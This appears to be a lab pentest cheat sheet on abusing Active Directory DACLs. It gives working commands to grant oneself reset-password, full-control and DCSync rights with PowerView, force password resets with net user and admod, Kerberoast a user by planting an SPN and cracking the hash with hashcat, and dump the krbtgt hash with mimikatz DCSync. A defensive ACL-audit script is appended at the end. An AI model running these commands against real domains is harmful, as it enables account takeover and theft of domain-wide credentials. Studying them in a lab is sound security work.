# DACL Abuse: On User & DCSync

#### On User

Here test1 is given Full Control over the fileserver user object.

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FfjrjOFWKfemuvPLvHUQD%2F1673315252905.png?alt=media&#x26;token=3e5c8c46-6b83-415e-9fd6-87d0dcc6852d" alt=""><figcaption></figcaption></figure>


<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2F37eRFjackJf3DCjkXmrA%2F1673317076574.png?alt=media&#x26;token=100cd492-58c7-4e7b-bbba-3ad2d397f981" alt=""><figcaption></figcaption></figure>


**Change Password**

* Exploitable rights:

  * GenericAll
  * WriteDACL

    ```powershell
    Add-DomainObjectAcl -TargetIdentity "CN=fileserver,CN=Users,DC=fbi,DC=gov" -PrincipalIdentity test1 -Rights ResetPassword -Verbose
    # Use WriteDACL to grant the force-change-password (reset password) right
    ```

    <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2F3GW7aGTqPL2i0nxxsYoH%2F1673343278112.png?alt=media&#x26;token=0bae58c4-49b5-4b29-9c14-bd8085d3dec0" alt=""><figcaption></figcaption></figure>

  * All extended rights: if PowerView's enumeration shows an ExtendedRight ACE without a specific extended right, the principal holds all extended rights
  * Force change password (reset password): PowerView shows an ObjectAceType of 00299570-246d-11d0-a768-00aa006e0529

  **Only with GenericAll can `net user` be used to change the password; otherwise admod has to be used**

```cmd
net user fileserver "QWEasd1234" /domain
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FzIPJhsYAAB2M1npXwk2m%2F1673315363046.png?alt=media&#x26;token=b2928c95-da29-4abe-800e-76f4bd5ec575" alt=""><figcaption></figcaption></figure>


```cmd
admod -b CN=fileserver,CN=Users,DC=fbi,DC=gov unicodepwd::QWEasd123456 -optenc
# Change the password to QWEasd123456
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FScM6tjWzVro3UXW3PTlf%2F1673340631620.png?alt=media&#x26;token=b12d06b3-fdad-428a-b240-0524ae7362c4" alt=""><figcaption></figcaption></figure>


**Add SPN (Kerberoasting)**

* Exploitable rights:
  * GenericAll
  * GenericWrite
  * WriteProperty
  * WriteOwner
  * WriteDACL

    ```powershell
    Add-DomainObjectAcl -TargetIdentity "CN=fileserver,CN=Users,DC=fbi,DC=gov" -PrincipalIdentity test1 -Rights all -Verbose
    # Grant GenericAll
    ```

```powershell
Set-DomainObject -Credential $creds -Identity fbi\fileserver -Set @{serviceprincipalname="MSSQL/Sqllserver"}
# Set an SPN on the fileserver user; because it shares its name with the machine account, fbi\fileserver is used to distinguish it from the machine

.\Rubeus.exe kerberoast /user:fileserver /nowrap
# Obtain the hash

Set-DomainObject -Credential $creds -Identity fbi\fileserver -Clear serviceprincipalname -Verbose
# Clear the SPN
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FKwGSTdDGM1YvVjjZYZNh%2F1673318161007.png?alt=media&#x26;token=5eed9204-4487-4ea5-b7c8-d36b2f7377ce" alt=""><figcaption></figcaption></figure>


Take the hash to hashcat and crack it.

```cmd
hashcat.exe -m 13100 spnhash.txt pwd.txt --force
```

#### DCSync

**Setup**

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FpfUrzKbutsvKXw058pC6%2F1673354284133.png?alt=media&#x26;token=3771a6b0-6de2-4986-9778-02b76d2acbfe" alt=""><figcaption></figcaption></figure>


**Exploitation**

```
lsadump::dcsync /domain:fbi.gov /user:krbtgt
```

* Exploitable rights:
  * GenericAll
  * All extended rights
  * Replicating Directory Changes All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) + Replicating Directory Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)

    <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2F9hgI5ZbrtnyByU1nYlmS%2F1673354203336.png?alt=media&#x26;token=082016c7-b9cc-45f1-975c-7b340510a3ae" alt=""><figcaption></figcaption></figure>

  * WriteDACL

    ```powershell
    Add-DomainObjectAcl -TargetIdentity "DC=fbi,DC=gov" -PrincipalIdentity test1 -Rights DCSync -Verbose
    # Grant the DCSync right to test1; this also adds the "Replicating Directory Changes In Filtered Set" right, which testing showed is not required
    ```

    <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FNEfIMuhzEnHiHlyHpR6J%2F1673354628549.png?alt=media&#x26;token=3530d6a1-4826-42b2-9566-f683b3056f9c" alt=""><figcaption></figcaption></figure>

    <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FmlFOqfgAHZ6cg2SDwA1E%2F1673354713699.png?alt=media&#x26;token=f2687ac6-aefb-4951-b1e7-201c95636ef3" alt=""><figcaption></figcaption></figure>

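A defensive counterpart to the rights listed in both the On User and DCSync sections: an added PowerShell audit (not from the original notes and not PowerView code) that reads the ACLs of the fileserver user object and the domain head and reports principals outside an expected set that hold the rights above, including the three extended-right GUIDs quoted on this page. It assumes the RSAT ActiveDirectory module (for the `AD:` drive) and the lab DNs from the page; the `$Expected` principal list is an assumption to adjust per environment.

```powershell
# Added defensive audit (not part of the original notes): report ACEs on the
# objects abused above that grant the rights this page lists, skipping principals
# expected to hold them. Assumes RSAT ActiveDirectory and the lab DNs from the page.
Import-Module ActiveDirectory

# Extended-right GUIDs quoted on this page
$RightGuids = @{
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}
$AnyObject = [guid]::Empty   # empty ObjectType = ACE covers all extended rights / all attributes

# Principals that normally hold these rights; assumption for this lab, adjust per environment
$Expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'FBI\Domain Admins',
              'FBI\Enterprise Admins', 'FBI\Domain Controllers',
              'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS')

function Test-Flag([System.DirectoryServices.ActiveDirectoryRights]$Rights, [string]$Flag) {
    $f = [System.DirectoryServices.ActiveDirectoryRights]$Flag
    return (($Rights -band $f) -eq $f)   # exact mask match, so a subset is not mistaken for GenericAll
}

function Find-DangerousAce([string[]]$DistinguishedName) {
    foreach ($dn in $DistinguishedName) {
        $acl = Get-Acl -Path "AD:\$dn"
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($Expected -contains $ace.IdentityReference.Value) { continue }
            $r = $ace.ActiveDirectoryRights
            $why = $null
            if     (Test-Flag $r 'GenericAll')   { $why = 'GenericAll' }
            elseif (Test-Flag $r 'WriteDacl')    { $why = 'WriteDacl' }
            elseif (Test-Flag $r 'WriteOwner')   { $why = 'WriteOwner' }
            elseif (Test-Flag $r 'GenericWrite') { $why = 'GenericWrite' }
            elseif ((Test-Flag $r 'WriteProperty') -and ($ace.ObjectType -eq $AnyObject)) { $why = 'WriteProperty (all attributes)' }
            elseif (Test-Flag $r 'ExtendedRight') {
                $g = $ace.ObjectType.ToString()
                if ($ace.ObjectType -eq $AnyObject)  { $why = 'All extended rights' }
                elseif ($RightGuids.ContainsKey($g)) { $why = $RightGuids[$g] }
            }
            if ($why) {
                [pscustomobject]@{ Object = $dn; Principal = $ace.IdentityReference.Value
                                   Right = $why; Inherited = $ace.IsInherited }
            }
        }
    }
}

Find-DangerousAce 'CN=fileserver,CN=Users,DC=fbi,DC=gov', 'DC=fbi,DC=gov' | Format-Table -AutoSize
```

The ExtendedRight entries it reports with the two replication GUIDs on the domain head are exactly the ones that make DCSync possible, so an entry for an ordinary user such as test1 is the finding to remediate; enabling Directory Service Access auditing (event 4662) on the domain head additionally records when those rights are exercised.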
